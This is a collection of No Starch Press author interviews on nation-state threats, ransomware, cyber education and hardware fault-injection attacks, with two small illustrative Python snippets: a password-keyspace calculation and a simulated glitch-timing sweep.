Jon DiMaggio: Traditional cybercriminals conduct attacks relying on a user to click a link in an email or visit a specific website. If the attack fails or security mechanisms defeat the threat before it can successfully infect a victim, the attack is over. That's why, with some exceptions, traditional attacks are geared at targets of opportunity, and not tailored to a specific victim.

Nation-state attacks, however, are the exact opposite. Nation-state attackers target specific victims, and are not only motivated but well-resourced. These advanced attackers have the backing of a government, and often develop their own malware and infrastructure to use in their attacks. Also, unlike traditional threats, nation-state attackers are rarely motivated by financial gain. Instead, they seek to steal intellectual property, sensitive communications, and other data types to advance or provide an advantage to their sponsoring nation.
 

NSP: Governments and militaries are no longer the only targets of nation-state hackers – private-sector companies are now under attack as well. Most of them already have automated security mechanisms, but are those an adequate defense against APTs?

JD: No. Due to the human element behind nation-state attacks, automated security defenses are not enough. Human-driven attacks simply return to the system through another door. And unlike other threats, nation-state attackers are in it for the long game, which is why the attacks continue even if initially defeated by automated defenses. For these reasons, you must handle nation-state attacks differently than any other threat your organization will face – ideally, by deploying human threat hunters.
 

NSP: Another disturbing trend is the growing list of advanced cyber threats targeting the industrial control systems (ICS) of critical infrastructure, like the U.S. power grid. In terms of cyberwarfare, are we getting closer to seeing intrusion campaigns against our electrical, water, and transportation systems escalate from espionage or reconnaissance missions to highly disruptive attacks that could paralyze entire cities?

JD: Not only are we getting closer to attacks on our critical infrastructure, but it has already happened in other countries. In 2015, the Russian government conducted cyber attacks that resulted in shutting down power across critical areas of Ukraine.

In 2017, when I worked at Symantec, our team discovered a Russian-based nation-state attacker we dubbed "Dragonfly," who infiltrated the U.S. power grid. The group was very close to gaining access to critical systems responsible for powering cities across the United States. In this case, security companies and the federal government worked together to mitigate the threat. This was a close call, but it just shows that nation-states are targeting our power grid – and likely will continue the effort moving forward.
 

NSP: In early October, the FBI and Cybersecurity Infrastructure and Security Agency (CISA) issued a warning that ransomware attackers, in particular, have been targeting water treatment and wastewater facilities. Do you have any insight into why ransomware attackers have recently moved from banks, local governments and healthcare systems to utility companies? Moreover, why are these critical facilities still so vulnerable to compromise given what we know about the threat and what’s at stake?

JD: Critical infrastructure appeals to ransomware attackers because they likely feel there is a greater chance the victim will pay. Additionally, the breach will be very apparent to the public, like in the Colonial Pipeline attack, when fuel stopped flowing and it resulted in a gas shortage across the East Coast. The effect of this type of attack is meant to be dramatic, and attackers know there will be high pressure from the general public to recover quickly. Usually, the fastest way to recover is to pay the ransom and obtain the decryption key.

Also, critical infrastructure often provides an easy target to savvy attackers. For example, when a cybercriminal attacked the water system in Florida last year, he did so by taking advantage of technology and infrastructure that allowed workers to remotely access the critical controls used to regulate the system. In short, the ease of access for city workers was more important than the system's security. This, unfortunately, is a common problem. To address many of these existing vulnerabilities will require building systems based on security – and not ease of use. While this may be less important to a retail provider, it should not be an option for industries involved with our infrastructure.
 

NSP: Over the past year you’ve focused your expertise on nation-state ransomware. One thing I’ve learned from your work is just how long sophisticated intruders spend in a victim’s network before kidnapping their data and sending a ransom notice, often lurking for weeks if not months. Why is attacker “dwell” time an important security metric?

JD: Yes, that's a point many security analysts are unaware of. Enterprise ransomware gangs spend between 3 and 21 days on a victim network, with the average time being around 10 days. During this time, the attacker enumerates the network, obtains and escalates privileges, disables security services, deletes backups, and steals the victim's sensitive data. Finally, once the staging and data theft phase is complete, they execute the ransomware payload throughout the victim's network.

The reason this timeframe is so important is that the human attacker is active on your network. The takeaway is that the longer the attacker engages within your network, the better chance a good threat-hunting team will have to find them. This is why I keep emphasizing that you really need a human team to hunt for advanced threats, not simply rely on automated defenses.
 

NSP: As ransomware has evolved and diversified, AI has found its way into the mix, turbo-charging attacks that can automatically scan networks for weaknesses, exploit firewall rules, find open ports that have been overlooked, and so on. But machine learning works both ways. What role could AI tools play in threat hunting?

JD: The combination of artificial intelligence and human threat hunters creates the magic formula necessary to defeat ransomware attacks. AI is one of the fastest and most accurate ways to identify suspicious or malicious activity and make quick mitigation decisions.

Based on the level of success ransomware gangs have had in recent years, current identification and mitigation capabilities are not working. At least, not consistently. In fact, several security vendors already base their technologies on artificial intelligence to mitigate threats. For example, the cybersecurity company DarkTrace recently used their tech – which relies on AI – to defeat a LockBit ransomware attack. (LockBit is a particularly pernicious ransomware-as-a-service gang that specializes in fast encryption speeds.) Using AI, DarkTrace identified and mitigated the attack within mere hours of its appearance in the environment.
 

NSP: Sounds like the AI future is nigh! Shifting tracks, let's wrap this Q&A up in the present. You chase bad guys for a living. And not just any bad guys – the kind who could bring an entire nation to its knees. But you’re also a dad. Do you talk to your kids about what you do? If so, how do you explain things like nation-state attacks, ransomware gangs, or cyberwarfare on their level (or at least in a way that sounds less scary) when they ask about your day?

JD: I do talk to my kids about what I do. I actually try to get them involved, and spend time teaching them and explaining some of the work I do at a high level. My youngest son Damian and I even did a podcast together on ransomware. My oldest son Anthony is a freshman in high school and just started taking cyber security classes this year.

They think what I do is more like what they see in the movies, so they will be in for a disappointment when they figure out it’s more research, analysis, and writing than hacking bad guys. However, it’s very rewarding that they have an interest in what I do, and they often brag to their friends about it. At the same time, they've seen me working with encoded text and malware, and make comments that I stare at “gibberish” all day and pretend to be working! But overall they are really proud of me and think what I do is “cool."

NSP: Part of your objectively "cool" job entails thinking like the adversary. While it seems unlikely a nation-state actor would hijack a home webcam or set up a fake WAP attack at the local cafe, are there any lessons you've learned from a career spent analyzing cyber criminals that inform your personal online security habits outside of work, or that you try to instill in your children?

JD: Yes, due to my work I have a very different, limited online life. For example, outside of work-related social media, I have no personal accounts. And even with my limited social-media presence, I never connect with family members – only work colleagues. I've used social media to map out relationships with adversary accounts, and I know that someone could do the same to me. For that reason, my kids don't use social media either, at least for now – unfortunately for them. It’s not that I'm over-protective, but I don’t want them targeted by an attacker in an effort to get to me. And, to be honest, I think it's healthier at this point in life to let them just be kids. They will have an entire lifetime to be engulfed in social media.

As for my personal habits online, I use three different identity monitoring and protection services to keep an eye on my accounts. I never reuse a password, nor do I use real “dictionary words” – and I always pair two-factor authentication with a hardware key (YubiKey). I am religious about updating my passwords frequently, and you will never find a device in my home with an uncovered camera. I also do not use traditional cloud-based services from vendors like Apple and Google.

To be honest, I live a pretty paranoid life because of the work I do and the fact that I put my name out there. At the same time, I think I need to be a bit paranoid, because if there is anything my job has taught me it is that anyone and anything can be hacked and compromised.


Cyber Defender Bryson Payne Takes Us to School


We continue the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series with Bryson Payne, PhD – author of Go H*ck Yourself: An Ethical Approach to Cyber Attacks and Defense (January 2022). In the following Q&A, we talk with him about training the next generation of cyber defenders, why there's never been a better time to get a job in infosec, the security benefits of thinking like an adversary, and whether ransomware could soon be coming for your car. (Spoiler alert: it's already here!)


Dr. Payne (@brysonpayne) holds the elite CISSP, GREM, GPEN, and CEH certifications, and is an award-winning cyber coach, author, TEDx speaker, and founding director of the Center for Cyber Operations Education at the University of North Georgia (an NSA-DHS Center for Academic Excellence in Cyber Defense). He's also a tenured professor of computer science at UNG, teaching aspiring coders and cyber professionals since 1998 – including coaching UNG’s champion NSA Codebreaker Challenge cyber ops team. His previous No Starch Press titles include the bestsellers Learn Java the Easy Way (2017) and Teach Your Kids to Code (2015).


No Starch Press: Cybersecurity Awareness Month is a great time to talk with you, because your career's been dedicated to making people aware of common and emerging security vulnerabilities. Recently though, high-profile hacks have hit the headlines like never before, with attacks on public utilities, government agencies, and customer databases causing real alarm among the general public. Are we starting to see a shift in the way mainstream society thinks about cybersecurity? If so, how can this be harnessed to make infosec stronger across the board?

Bryson Payne: All of us are seeing cyberattacks and breaches in the news, in the companies we do business with, and even in our own families. It’s a scary time to be so dependent upon technology, but there’s a bright side, yes – regular people are becoming smarter about how they use their devices, how they secure their information, and what information they share.

By understanding the threats that are out there, and how cybercriminals and cyberterrorists perform simple to complex attacks, you and I can protect ourselves and our families from cybercrime (or worse). And by training a new generation of cyber defenders, we can better protect our nation and our economy from future cyber threats.

NSP: You’re the founding director of the Center for Cyber Operations Education at UNG, where you’re also a tenured professor of computer science. So perhaps it’s no surprise that in 2018 UNG began offering a bachelor’s degree in cybersecurity – one of the nation’s first. Considering there are already a number of academic pathways that can lead to successful careers in the infosec world, what’s the benefit of pursuing such a specific major?

BP: The hands-on experience our students gain from real-world ethical hacking, forensics, network security, and reverse engineering – in the classroom, in competitions, or through industry certifications – is closer to what they’ll see in industry, government, and military cyber roles than what traditional computer science or IT programs provide. In fact, the NSA and Department of Homeland Security are certifying more National Centers of Academic Excellence in Cyber Defense, like UNG, each year in order to give students the real-world skills needed to fight cybercrime, cyber terrorism, and even cyberwarfare for the next generation.

NSP: Does the addition of this degree program reflect a growing demand for cybersecurity pros in the workforce? And, for anyone reading this who’s considering going into the field (or going back to school to get credentialed), what are some of the career options you encourage students to explore?

BP: According to cyberseek.org, there are over 400,000 positions in cybersecurity open right now in the U.S. alone, with tens of thousands of new postings appearing every month. If you’re considering going into cyber, there’s never been a better time to get a certification, take a course, or study on your own.

If you like police dramas or mysteries, forensics could be a good fit. If you like taking things apart and (sometimes) putting them back together, reverse engineering or ethical hacking might be fun for you. If you like making sure everything works like it’s supposed to, you might make a great network operations or security operations center analyst. There’s a job for everyone, from trainers to managers to technicians – and the pay is growing faster than for many positions in non-security fields.

NSP: Studies have shown that at least half of college-age adults don’t pursue tech-related careers because they believe the subjects are too difficult to learn. What do you say to people who are interested in cybersecurity but don’t think they have what it takes?

BP: There are so many paths into cyber, whether you start out in psychology, journalism, international affairs, criminal justice, business, math, science, engineering, even health sciences. Cyber is a team sport, and we need people who understand not just the technology, but the people, processes, and even the cultures and languages involved in cybercrime, cyberattacks, and cyberwarfare. Every organization, from Fortune 500 companies to city governments, schools, and healthcare institutions, needs people like you and me thinking about cybersecurity and how to protect employees or customers.

But, while it's important to know that not every cyber job is a technical role, the more comfortable you are with the technology, the farther you can go.

NSP: Your upcoming book, Go H*ck Yourself, teaches readers how to perform just about every major type of attack, from stealing and cracking passwords to launching phishing attacks, using social engineering tactics, and infecting devices with malware. Some critics might find it ironic that a champion of cyber defense would write a book that literally teaches people how to execute malicious hacks. Explain yourself!

BP: Just like in a martial arts class, you have to learn to kick and punch while you’re learning to block kicks and punches – you have to understand the offense to be able to defend yourself. By thinking like an adversary, you’ll see new ways to protect yourself, your company, your family, and the devices and systems you rely on in your daily life.

For too long we’ve been told what to do, but not why we need to do it. A great example is the password cracking you mentioned. When a reader sees how quickly and easily they can crack a one- or two-word password, even with numbers and symbols added to it, they finally have the mental tools to understand why we’re advocating for passphrases of four or five words. It’s the same with all the other attacks – once you see what a hacker can do, you understand how important good cyber hygiene is, and how small steps to secure your devices can really pay off.
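The arithmetic behind that passphrase advice is easy to sketch. The numbers below are illustrative assumptions for this post (a 20,000-word cracking dictionary, the 7,776-word diceware list, a 10-billion-guess-per-second rig), not figures from the book:

```python
import math

# Rough keyspace comparison: a dictionary word with digits/symbols
# tacked on vs. a four-word random passphrase. All sizes here are
# illustrative assumptions, not measurements.
DICT_WORDS = 20_000        # assumed attacker wordlist
SUFFIX_VARIANTS = 10_000   # assumed appended digits/symbols, e.g. "!2024"
DICEWARE_WORDS = 7_776     # standard diceware list size

word_plus_digits = DICT_WORDS * SUFFIX_VARIANTS  # "password!2024"-style
passphrase_4 = DICEWARE_WORDS ** 4               # four random words

print(f"word+digits keyspace: {word_plus_digits:.2e} "
      f"(~{math.log2(word_plus_digits):.0f} bits)")
print(f"4-word passphrase:    {passphrase_4:.2e} "
      f"(~{math.log2(passphrase_4):.0f} bits)")

# At an assumed 10 billion guesses/second against a fast hash:
rate = 10**10
print(f"word+digits cracked in {word_plus_digits / rate:.2f} s")
print(f"passphrase needs ~{passphrase_4 / rate / 86_400:.0f} days")
```

The word-plus-digits password falls in a fraction of a second, while the passphrase costs the attacker days even under these generous assumptions – and far longer against a properly slow password hash.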

NSP: One type of attack that's really skyrocketed lately is ransomware. Your home state of Georgia is just one example – city and county governments, state agencies, hospital systems, even local election systems have fallen victim to ransom demands. With hackers hammering away at our institutional weak spots, something as simple as delaying a security patch or clicking a link in a socially engineered email can usher in a potentially devastating attack. What do you think can be done to prevent the human errors arguably fueling the current ransomware rage?

BP: Ransomware is definitely one of the most serious threats to your business, your family, and your own financial security. But the good news is that you can keep yourself from being an easy target. While the news often refers to humans as the weakest link, I actually see us as the best first line of defense. Employees and leaders who can spot phishing emails, who install updates and patches regularly, and who use good cyber hygiene can block more than 99% of known attacks before they get into your organization! And smart security-minded computer users can also apply these practices at home to protect themselves and their loved ones from online adversaries on the prowl for easy vulnerabilities.

NSP: Along those same lines, a lot of organizations have started backing up their files as a failsafe. But hackers being hackers, they’ve already adapted: double-extortion ransomware is now the norm, where the data’s exfiltrated before it’s encrypted so it can be released online if the ransom is not paid. How bad is the problem, and what's the solution?

BP: Double-extortion malware can have the most devastating financial impact short of cyber-physical attacks (and by that I mean when malware takes over a manufacturing facility, critical infrastructure, or medical facility and causes real-world, physical damage to real equipment or even endangers human life). It's true that backups used to be enough to recover from ransomware without paying the ransom, but these double-extortion attacks can steal data for months before locking down systems and demanding payment.

The best defense, in addition to those backups, is having well-trained cyber professionals doing what we call "active threat hunting" – looking for suspicious activity, like small file transfers overnight or to unknown networks, and tracking down systems that show indicators of attack or compromise. That’s why it’s important that we train more cyber defenders. Every organization needs cyber heroes now, so it's the perfect time to develop these skills.

NSP: Dr. Payne, you have arrived at your final destination. (Well, my last question anyway.) Over the past decade you’ve done some very cool conference presentations on car hacking, and have since turned them into a tutorial on your blog. The cool factor aside, this is an increasingly relevant skill set for aspiring white hats – since 2016 there’s been a 94% year-over-year increase in automotive cybersecurity incidents, including remote attacks that can control your steering, pump your brakes, shut down the engine, unlock your doors, open the trunk, etc.

1) Is it only a matter of time before ransomware infects this realm of life, with people, say, unable to start their car until they pay a hacker? 2) In the future, should automakers be pentesting cars at the level they perform crash tests? 3) Does this keep you up at night, or are you optimistic that your UNG graduates will have a solution?

BP: It is only a matter of time before we see ransomware and similar attacks regularly affecting smart cars. Today’s automobiles can have more than 40 computer chips, dozens of systems, and networks and connections from USB to 5G, Wi-Fi, Bluetooth, GPS, satellite radio, and more. We call that the “attack surface” of a system, and with so many ways for hackers to try to get into your vehicle, we’ve actually already seen successful remote attacks in the wild – and we’ll continue to see new ones. The good news is that every make and model is slightly different, so a hack that works on a Honda might not work on a Ford, and vice versa.

That being said, auto manufacturers have a responsibility to secure the networks and computer systems inside your vehicle and mine from malicious hackers, which is why I happen to believe that teaching young people how to test and secure these systems – starting within a virtual environment like we do in the book – is one of the best ways to protect our vehicles and our personal safety from ransomware on the roadway.

Break It Till You Make It: Q&A with Hardware Hackers Colin O'Flynn and Jasper van Woudenberg


To kick off the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series, we're joined by Colin O’Flynn and Jasper van Woudenberg, co-authors of The Hardware Hacking Handbook (available November 2021). In the following Q&A, we talk with Colin (@colinoflynn) and Jasper (@jzvw) about the perils of proprietary protocols being replaced with network devices, the problem of having too many interesting targets to test your tools on, the beauty of AI-designed attack systems, the indisputable power of “hammock hacking,” and why nobody cares about fault injection until they get hacked with fault injection.


Colin runs NewAE Technology, Inc., a startup based on his ChipWhisperer project that designs tools to make hardware attacks more accessible, and teaches engineers about embedded security – a topic he frequently speaks about at conferences and on tech podcasts.

Jasper is CTO of Riscure North America, where he leads the company’s pentesting teams, and has a special interest in integrating AI with security. His research has been published in various academic journals, and he’s a regular speaker at educational and hacking conferences.

No Starch Press: I’ll start by saying that your book is timely! Hardware hacking, once a niche field of the exploit world, has become far more relevant amidst the proliferation of embedded devices all around us. What do you think accounts for this, and why are side-channel attacks in particular becoming increasingly common (and difficult to prevent)?

Colin O'Flynn: Hardware hacking has been a niche field, but one with an extensive and long history. Most of the powerful attacks we’re discussing today have been demonstrated for 20 years, so I’d say they should be “well-known.” But the truth seems to be that, until recently, advanced hardware attacks weren’t needed for most IoT devices. Default passwords and unlocked debug interfaces were the norm, so most hardware hackers never needed to dig deeper. Many people I’ve talked to at events have told me they were interested in side-channel and similar advanced attacks but never had time to actually learn them, as they were always able to break devices with easier and faster attacks!

The good news is that device manufacturers seem to be taking security more seriously these days, which means side-channel attacks have become a real threat. So I guess we’re seeing the industry fast-forwarding that 20-year lag of security research to catch up.

Jasper van Woudenberg: Hacking always moves with interesting targets. Once pinball machines started requiring money to play, people “hacked” them by just tilting the whole machine. Nowadays physical pinball machines have a tilt sensor – if you tilt the machine in order to affect the ball, it ceases operation. Of course, we’re talking about digital hardware in our book, but bypassing security systems is as old as security systems. So, the abundance of digital devices naturally increases the amount of hacking going on. Side-channel attacks are fascinating if you’re into the intersection between electronics, signal processing and cryptography. Beyond being fascinating though, they only become relevant when more straightforward attacks are mitigated.

NSP: Fault injection (FI) attacks – which inject a glitch into a target device that alters its behavior so you can bypass security mechanisms – used to be too “high end” for most hackers to bother with, often requiring expensive tools and intimate technical knowledge of the specific system under attack. But those days are over. Not only are low-cost FI toolkits readily available, the explosion of IoT has led to the rise of new defensive features, like Secure Boot, that can be easily subverted by a well-timed FI attack. What are the potential risks to a larger IoT network once a device is compromised this way?

CO: In the past we’ve seen end devices used as a pivot point into a more sensitive network. When it comes to commercial devices, we’re seeing many proprietary protocols replaced with network devices. For example, recent access-control readers are now simply PoE devices that talk back to a central server. With many of these devices, the original designers haven’t considered what happens if an end node becomes compromised. While the network may be correctly secured, you still see sensitive credentials stored in end devices become accessible to an attacker. And if an attacker is able to access these credentials, it means they may be able to pivot off the external network and into more sensitive internal networks.

JVW: I think the cost of the tools is a common misunderstanding – they can be really inexpensive. In our lab, we’ve done attacks literally by soldering a single wire to a bus and connecting it to a button; when we pressed the button at the right time, the system booted our own code. The cost usually comes from the many days and weeks spent figuring out how to carry out the attack. And yes, some attacks do require high-end equipment, or at least equipment that can bring down the time needed to figure out the attack.
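That “press the button at the right time” search is, at heart, a parameter sweep. Here is a minimal simulation of the idea – the target device, its vulnerable timing window, and the helper names are all made up for illustration; on real hardware this role is played by glitching tools like ChipWhisperer:

```python
# Simulated voltage-glitch search: sweep the delay between reset and
# glitch until the target's boot check is skipped. The "target" below
# is a stand-in function, not real hardware.

GLITCH_WINDOW = (1200, 1210)  # hypothetical microsecond window where the check runs

def target_boots_our_code(glitch_delay_us: int) -> bool:
    """Simulated device: the glitch only lands inside the vulnerable window."""
    return GLITCH_WINDOW[0] <= glitch_delay_us <= GLITCH_WINDOW[1]

def sweep(lo: int, hi: int, step: int = 5):
    """Brute-force the glitch delay – pressing the button at varying times."""
    for delay in range(lo, hi, step):
        if target_boots_our_code(delay):
            return delay
    return None

hit = sweep(0, 5000)
print(f"successful glitch delay: {hit} us")  # → 1200 us in this simulation
```

Real campaigns sweep more dimensions (glitch width, voltage, repeat count), which is exactly where the days and weeks – and, later in this interview, the AI-driven parameter optimization – come in.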

One common stepping-stone attack we see is the firmware dump. Typically, embedded-device firmware does not receive a lot of scrutiny, and may have lingering vulnerabilities that can be exploited. This usually means gaining control over a single device, but there have been wormable firmware issues in the past.

NSP: What measures can be taken to harden embedded systems against FI attacks, and do you see this happening throughout the industry (why or why not)?

JVW: We always advise our customers to threat model and see if it makes sense to consider FI in scope. Usually that’s the case for embedded systems that are out in the field and have sensitive assets to protect. Next is the question of whether faults can be mitigated in hardware and/or software. Doing both is ideal, but that’s not always feasible. Our book contains a chapter on countermeasures that also has a lab, so people can try out some ideas for FI countermeasures. Finally, verifying countermeasures early and often is critical. It’s virtually impossible, as a human, to predict all the ways a system can fault. Pre-silicon fault simulation and post-silicon fault injection, without exception, turn up surprises. Iteration and adaptation are key.

And then the million-dollar question: why is the hardening not happening throughout the industry? It’s a combination of cost and human nature. There is a real engineering cost to these countermeasures, so typically we only see customers that have had their devices compromised requiring FI resistance. If a compromise hasn’t happened, it’s very easy to write the attacks off as unrealistic or irrelevant. Nobody cares about fault injection until they get hacked with fault injection.

CO: Fault injection can be tricky to prevent, as we see countermeasures applied that aren’t effective. For instance, Jasper and I demonstrate a few examples in the book where compilers might remove the effect of your clever countermeasures. There seems to be a lot more interest in this now – for many companies, they just need some “end customer” to ask about it. I talked to silicon vendors a few years ago who were tracking countermeasure ideas, but basically none of their customers (people who actually build products) cared about FI attacks. So that meant they weren’t going to pay for engineering efforts to add those countermeasures. We seem to be seeing a very fast shift in the last couple of years though, so people who were tracking this early-on are in a good position to quickly offer solutions.

NSP: Speaking of low-cost fault-injection toolkits, Colin, you developed one of the most popular models out there, the ChipWhisperer, and built a company around it (NewAE Technology). Given that just about everything we use in our homes and offices has embedded computing systems and could be vulnerable to attack, how do you pick which devices to test your boards and analysis algorithms on? An example from your book would be smart toothbrushes – are you ever doing something like brushing your teeth when it suddenly occurs to you, “Wow, I could totally hack this thing”?

CO: This is actually a big problem! Unfortunately I tend to buy a lot of devices (microcontrollers, IoT products, industrial control systems, etc.) because I think they will be interesting to poke at! As a result, I’ve got a storage cabinet full of various devices along these lines… I’m slowly working through some of them, and when we get some time at the company, we’ll pick away at one or two of those devices as well.

But as more devices include embedded security, there are more “interesting” targets than there is any hope of finding time for. Part of why we design many different target-board devices (our “UFO targets” for ChipWhisperer) is actually to help out other researchers by giving them an easier platform to work with.

NSP: Once you successfully exploit a commonly used product, do you let the manufacturer know or is that generally considered an exercise in futility?

CO: If I plan on talking about an issue publicly I’ll reach out, even if I don’t think it’s serious. Sometimes it takes a bit of time to reach the correct person (or team), but so far these disclosures have generally turned into positive experiences all around.

With one ongoing disclosure, for example, the engineering team had internally flagged that there could be some issues related to a relatively insecure microcontroller they were using in a product, and my report validated their internal concerns. In this case they were already working on a new design, but I’m sure my report was a nice bonus for the people involved, as they can point to it as proof that the issue would eventually be found “in the wild.” In the meantime it gave them the opportunity to provide an interim fix via a firmware update for existing customers.

NSP: Jasper, one of your specialized areas of interest is combining AI with security research. Would you explain what this entails? And looking into the future, how could AI applications be leveraged to improve hardware and embedded security at the design level?

JVW: What I love about AI is also what I love about hacking: making a computer device do more than the original designer put in. With AI, this is tying a couple of artificial neurons together and getting a cat-and-dog image detector. With hacking, this is sending some weird input into a program and all of a sudden it executes arbitrary code.

The combination, I find fascinating. For instance, we’ve used neural networks to do side-channel analysis and outperform human-designed algorithms. We created an algorithm with colleagues that automatically optimizes fault injection parameters. I’ll work very hard to create some automation so I can be – paradoxically – lazy afterwards.

I firmly believe that most if not all cognitive activities, such as designing or attacking systems, will be better performed using AI rather than brains – the big question is when. I prefer to be on the side of making systems more secure through AI, so my research is going towards automating both the detection and mitigation of vulnerabilities, at scale. For instance, a big push we have currently is in pre-silicon security – detecting side-channel and fault issues before they make it into products. I wouldn’t say we’ve arrived at using AI yet, but the first steps are being made.

NSP: Both of you have advanced degrees, which makes sense given all of the academic knowledge involved with embedded security. Yet, The Hardware Hacking Handbook makes very little assumption about a reader’s background. What was your approach to making this challenging field accessible to novices and newcomers, and why was it important enough that you wrote an entire book on this premise?

CO: My career path on paper seems relatively full of academic love – I was an assistant professor for several years in the Electrical & Computer Engineering department at Dalhousie University. But back at the start, when I was considering applying for my undergraduate degree in electrical engineering, I came relatively close to not attending university at all. I had taught myself a fair amount about electronics in high school and managed to get a summer job that was effectively an electrical engineering internship, so I was considering just continuing to grow through on-the-job experience instead. In the end I fell onto the academic path, but I’ve always believed that it is not the only path, and that experience shapes my desire to make this field as accessible as possible.

While many readers may be undergraduate or grad students, it’s clear that a classic academic textbook would cut out readers coming from other backgrounds (everyone from high school students to professionals interested in exploring other careers). Practically, what we write down isn’t the only consideration – one of the great things about working with No Starch Press is that the pricing of the books makes them more accessible as well. From an academic publisher, this book would have been $150+. And there would never be Humble Bundle sales that make it accessible on the level that NSP does!

JVW: I’ve taught courses on side-channel analysis and fault injection for years, and that experience has shown me that the people who have to defend against these attacks are not necessarily interested in all the theory and research in this field. They want to focus on their goal of creating a system.

Then there’s the group of people like teenage me. I started hacking software before I had an internet connection, so I know the struggle of having to figure out everything by yourself. Looking around at the amazing blogs, videos, tutorials, and so on that exist for the software space today really made me realize what a gap there is on the hardware side.

So, for both these groups, it’s really about breaking things down into practical tips and tricks, plus some unavoidable theoretical background. I really want to show people that this space isn’t daunting, and that even someone like me – who came from a software background – can learn and enjoy it.

NSP: I’ll end with an easy one (I think) – what is your favorite hacking tool, and has that changed since you first got interested in hardware hacking when you were young?

CO: I should probably say my favourite tool is one of my own more-advanced products. But really, a good DMM is the most important tool! And in that regard, it hasn’t changed much over the years – one of my first “dream gifts” (back when Santa would be responsible for it) was a Fluke 12 multimeter, long before I knew about hardware hacking. I’ve since upgraded to a nicer meter (Fluke 179/EDA2 kit), but as we talk about in the book, there is so much you can do with this tool! Finding where pins go, checking the state of logic levels and voltages – it’s still my most used tool when I’m looking at a new device.

JVW: I started being “creative with technology” in the mid-’90s. What has changed is the amount of information available, and the fact that security is now an actual career – I still don’t always believe people are willing to pay me to do this. What hasn’t changed is my curiosity, and the rush that comes with solving a complex problem.

Favorite hacking tool? Hah. Although I use devices for a significant portion of the day, they are also a source of frustration. So, those are out. I’m going to say: my hammock. When I get stuck on a problem and I sense no more new ideas are being produced, or I get frustrated, I drop the problem for a few hours or days. Then I hop in my hammock for what I call “hammock hacking.” This is where I hang back and relax. I’ll almost always have a new view on the problem, or another way of connecting some dots that I hadn’t considered before. Or I fall asleep. But it’s a win in either case.